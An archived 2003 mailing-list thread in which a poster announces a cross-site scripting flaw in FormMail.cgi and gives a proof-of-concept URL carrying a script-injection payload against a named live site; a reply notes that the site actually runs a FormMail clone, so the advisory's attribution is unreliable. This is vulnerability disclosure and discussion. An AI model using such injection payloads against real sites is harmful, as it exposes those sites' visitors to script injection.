PDA

Bekijk Volledige Versie : XSS (Cross Site Scripting) on FormMail.CGI


Rynho Zeros Web
21/01/03, 03:54
################################################## ###########

Topic: XSS (Cross Site Scripting) on FormMail.CGI
Version: 1.92
Released: April 21, 2002
Manufacturer: http://www.scriptarchive.com/formmail.html

By XyborG - xyborg@bigfoot.com - http://www.rzweb.com.ar/

################################################## ###########


Formmai.cgi, it is a utility that serves to send forms by email, among other
uses.

The operation is simple. To see example:


http://www.l-c-u.com.ar/cgi-sys/FormMail.cgi?<script>alert("<center>Sorry,this\nis\nthe\nsecurity\nsite?\nNo_lo_Creo\n \nCyervo_Lamos...");</script>

Duh!

################################################## ###########

Topic: XSS (Cross Site Scripting) on FormMail.CGI
Version: 1.92
Released: April 21, 2002
Manufacturer: http://www.scriptarchive.com/formmail.html

By XyborG - xyborg@bigfoot.com - http://www.rzweb.com.ar/

################################################## ###########

--
XyBØrG
WebMaster de:
www.RZW.com.ar
Powered By Dattatec.Com

+++ GMX - Mail, Messaging & more http://www.gmx.net +++
NEU: Mit GMX ins Internet. Rund um die Uhr für 1 ct/ Min. surfen!
Scott Buchanan
23/01/03, 02:00
According to the script at: http://www.l-c-u.com.ar/cgi-sys/FormMail.cgi
which says:

FormMail-Clone
This is FormMail-clone, a clone of FormMail.cgi. It is a clean room version
for legal purposes (a less restrictive liscense), but should behave the
exact same way as Matt Wright's Original, but contain none of his code.

it isn't the same script as: http://www.scriptarchive.com/formmail.html


It is nice to see that Matt Wright has finally updated FormMail to be less
SPAM friendly, but there have been a few more secure alternatives around
for a while - there's even a link to 'NMS' FormMail on the Script Archive page.

Rynho Zeros Web wrote:
> ################################################## ###########
>
> Topic: XSS (Cross Site Scripting) on FormMail.CGI
> Version: 1.92
> Released: April 21, 2002
> Manufacturer: http://www.scriptarchive.com/formmail.html
>
> By XyborG - xyborg@bigfoot.com - http://www.rzweb.com.ar/
>
> ################################################## ###########
>
>
> Formmai.cgi, it is a utility that serves to send forms by email, among other
> uses.
>
> The operation is simple. To see example:
>
>
> http://www.l-c-u.com.ar/cgi-sys/FormMail.cgi?<script>alert("<center>Sorry,this\nis\nthe\nsecurity\nsite?\nNo_lo_Creo\n \nCyervo_Lamos...");</script>
>
> Duh!
>
> ################################################## ###########
>
> Topic: XSS (Cross Site Scripting) on FormMail.CGI
> Version: 1.92
> Released: April 21, 2002
> Manufacturer: http://www.scriptarchive.com/formmail.html
>
> By XyborG - xyborg@bigfoot.com - http://www.rzweb.com.ar/
>
> ################################################## ###########
>


--
regards,

scott buchanan / systems engineer
scott.buchanan@axegroup.com.au
axe group 51a hume street crows nest nsw 2065 australia
abn 62 095 107 814 t +61 2 9966 9336
f +61 2 9966 9337

This email and any files transmitted with it are confidential and intended
solely for the use of the individual or entity to whom they are addressed.
If you have received this email in error please notify axe group.